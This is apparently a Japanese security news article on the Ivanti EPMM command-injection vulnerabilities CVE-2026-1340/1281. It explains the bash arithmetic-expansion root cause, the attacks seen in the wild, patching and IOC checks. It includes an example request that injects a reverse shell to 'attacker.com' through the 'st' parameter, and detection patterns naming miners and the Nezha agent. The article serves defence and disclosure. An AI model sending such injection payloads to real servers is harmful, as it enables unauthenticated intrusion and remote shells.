IvantiのMDMソリューション「EPMM」に深刻な脆弱性CVE-2026-1340/1281(CVSS 9.8)が見つかり、4,400超のインスタンスが危険にさらされています。CISAはKEVカタログに登録し連邦機関へ4/11までのパッチを命令。実際の攻撃手法と緊急対策を解説します。
4万社が使うMDMに認証不要のRCE脆弱性
2026 年 4 月 8 日、米国 CISA(サイバーセキュリティ・インフラストラクチャセキュリティ庁)は CVE-2026-1340 を KEV(既知の悪用脆弱性)カタログに追加し、連邦機関に対して 4 月 11 日(土)深夜までのパッチ適用を義務付けた。
問題は Ivanti Endpoint Manager Mobile(EPMM)——世界 40,000 社以上が採用するエンタープライズ向けモバイルデバイス管理(MDM)ソリューションだ。組み合わせて悪用される CVE-2026-1281 とともに、いずれも **CVSS スコア 9.8(Critical)**という最高クラスの深刻度を持つ。パロアルトネットワークス Unit 42 の調査では、インターネット上に 4,400 超の EPMM インスタンスが露出しており、実際の攻撃が広範かつ自動化された形で進行していることが確認された。
- CVE-2026-1340(CVSS 9.8): AFT ストア URL ハンドラーのコードインジェクション
- CVE-2026-1281(CVSS 9.8): App Store URL ハンドラーのコードインジェクション
- 認証要件: 不要(unauthenticated RCE)
- 露出インスタンス: 4,400 超(Cortex Xpanse 計測)
- CISA KEV 登録: 2026 年 4 月 8 日
- 連邦機関パッチ期限: 2026 年 4 月 11 日
- 修正バージョン: EPMM 12.8(2026 年 3 月 18 日リリース済み)
脆弱性の根本原因 ─ Apache RewriteMap の bash スクリプト
Unit 42 の詳細な技術分析が明らかにした根本原因は、Apache Web サーバーの URL リライト処理に使われているレガシー bash スクリプトだ。
EPMM は Apache の RewriteMap ディレクティブを使って一部の URL を内部スクリプトにルーティングしている。問題のスクリプトは 2 つある。
| CVE | スクリプト | エンドポイント |
|---|---|---|
| CVE-2026-1281 | /mi/bin/map-appstore-url | /mifs/c/appstore/fob/ |
| CVE-2026-1340 | /mi/bin/map-aft-store-url | /mifs/c/aftstore/fob/ |
どちらのスクリプトも、HTTP リクエストのパラメーター(st と h)を bash の算術展開($(( )))の中で直接展開してしまう。攻撃者はパラメーター内にコマンド置換($( command ))を仕込むことで、認証なしに OS コマンドをサーバー上で実行できる。
# CVE-2026-1281 の攻撃ベクターのイメージ(概念例)
# 実際のリクエスト形式:
# GET /mifs/c/appstore/fob/?st=$(id)&h=test
# EPMM サーバーは st パラメーターを bash 算術展開に渡してしまう
# 攻撃者はこのような形でリバースシェルを確立できる
# GET /mifs/c/appstore/fob/?st=$(bash+-i+>&+/dev/tcp/attacker.com/4444+0>&1)&h=xbash の算術展開 $(( expression )) は式中の変数を展開する。しかし $() によるコマンド置換も同時に評価されるため、ユーザー入力をサニタイズせずに展開すると任意コマンドが実行できてしまう。これは古典的な「シェルインジェクション」だが、エンタープライズ製品のコアコンポーネントに残存していた点が問題だ。
実際の攻撃で何が起きているか
Unit 42 は大規模かつ高度に自動化された攻撃を観測している。攻撃者が EPMM インスタンスを侵害すると、以下のような後続アクションが即座に実行される。
1. Web シェルの設置
攻撃者が最初に行うのは、再接続を容易にするための JSP Web シェルの設置だ。確認されているファイル名は 401.jsp・403.jsp・1.jsp——エラーページを模したファイル名でログ監視をすり抜ける。
2. 監視エージェントの偽装インストール 「Nezha」という正規の中国製サーバー監視エージェントが悪用されている。正規ツールをバックドアとして使うことで、セキュリティ製品による検出を回避する。
3. 暗号通貨マイナーの展開 サーバーリソースを使った暗号通貨マイニングが確認されている。これは短期的な金銭的利益と、より深刻な後続攻撃への布石だ。
4. 永続的バックドア 長期的な侵害維持のための持続的バックドアが設置される。これにより攻撃者は、パッチ適用後もシステムへのアクセスを維持できる可能性がある。
地域別露出インスタンス(Shadowserver 調査):
- ヨーロッパ: 569 インスタンス(最多)
- 北米: 206 インスタンス
確認された被害セクター(Unit 42):
- 州・地方政府機関
- 医療機関
- 製造業
- 専門職・法律サービス
- ハイテク企業
Ivanti EPMM ─ 繰り返されるセキュリティ問題
今回の脆弱性は単発の問題ではない。CISA はこれまでに Ivanti 製品で合計 33 の脆弱性を KEV カタログに登録しており、うち 12 件はランサムウェアの攻撃経路として悪用が確認されている。
過去の主な EPMM/Ivanti 脆弱性:
| CVE | 年 | CVSS | 悪用状況 |
|---|---|---|---|
| CVE-2023-35078 | 2023 | 10.0 | ゼロデイ・国家支援 APT |
| CVE-2023-35082 | 2023 | 9.8 | ゼロデイ連鎖悪用 |
| CVE-2024-21887 | 2024 | 9.1 | CISA KEV |
| CVE-2026-1281 | 2026 | 9.8 | 現在進行中 |
| CVE-2026-1340 | 2026 | 9.8 | 現在進行中(CISA KEV) |
この繰り返しのパターンは、Ivanti 製品のアーキテクチャ上の課題を示している。MDM/UEM ソリューションは企業のモバイルデバイスすべてを管理する中枢であり、一度侵害されると影響は組織全体に広がる。
緊急対策 ─ 今すぐ実施すべき手順
ステップ 1: 脆弱なバージョンの確認
# EPMM 管理コンソールにログインし、バージョンを確認
# 12.8 未満のバージョンは全て脆弱
# Settings > System Information でバージョン確認可能ステップ 2: パッチ適用
Ivanti は 2026 年 3 月 18 日に EPMM バージョン 12.8 をリリース済みだ。このバージョンでは問題の bash スクリプトが修正・強化されており、パッチ適用にダウンタイムは不要で、展開に要する時間は数秒とされている。
適用ターゲット: EPMM 12.8(RPM 12.x.0.x または 12.x.1.x)
Ivanti セキュリティアドバイザリ: https://forums.ivanti.com/s/article/Security-Advisory-EPMMステップ 3: 侵害の痕跡調査(IOC チェック)
パッチ適用前後にかかわらず、以下の確認を実施する。
# JSP Web シェルの存在確認
find /opt/MobileManager/ -name "*.jsp" | xargs grep -l "Runtime.exec\|ProcessBuilder\|cmd" 2>/dev/null
# 不審なプロセスの確認
ps aux | grep -E "nezha|xmrig|minerd|cryptominer"
# 最近変更されたファイルの確認(過去 30 日)
find /opt/MobileManager/ -mtime -30 -name "*.jsp" -o -name "*.war" 2>/dev/null
# ネットワーク接続の確認
netstat -antp | grep -E "ESTABLISHED" | grep -v ":443\|:80\|:8443"パッチの即時適用が困難な場合の一時的な緩和策:
- インターネットへの直接露出を遮断: EPMM を VPN ゲートウェイ後段に移動するか、インターネット向きのアクセスを一時的にブロック
- 脆弱なエンドポイントへのアクセスを制限:
/mifs/c/appstore/fob/と/mifs/c/aftstore/fob/への外部アクセスを WAF でブロック - ログ監視の強化:
st=やh=パラメーターに$(を含むリクエストをアラート設定 - Ivanti セキュリティ診断ツールの実行: Ivanti 提供の Integrity Checker を使用して既存の改ざんを確認
MDMは「攻撃の高価値標的」という認識を
MDM ソリューションは組織のモバイル資産すべてを管理する権限を持つ。EPMM を介して企業の全スマートフォン・タブレットへのポリシー配信、アプリのリモートインストール、デバイスの完全ワイプが可能だ。
これは言い換えると、EPMM サーバー 1 台を侵害するだけで組織の全モバイルデバイスに対して任意のアプリケーションを配布できることを意味する。EDR エージェントをバイパスしたマルウェアを全社員の端末に一斉展開するシナリオも、理論上は成立する。
Ivanti の脆弱性対応の速度と信頼性については業界からも批判が続いている。EPMM など高権限を持つインフラ製品は、一般的な SaaS アプリケーション以上に厳格なパッチ管理と、常時のエクスポージャー監視が求められる。
参考情報
- CISA Known Exploited Vulnerabilities Catalog: CVE-2026-1340(2026年4月8日)
- Palo Alto Networks Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited
- BleepingComputer: CISA orders feds to patch exploited Ivanti EPMM flaw by Sunday
- Shadowserver Foundation: Ivanti EPMM Internet Exposure Report(2026年4月)
- Ivanti Security Advisory: EPMM Vulnerabilities CVE-2026-1281 and CVE-2026-1340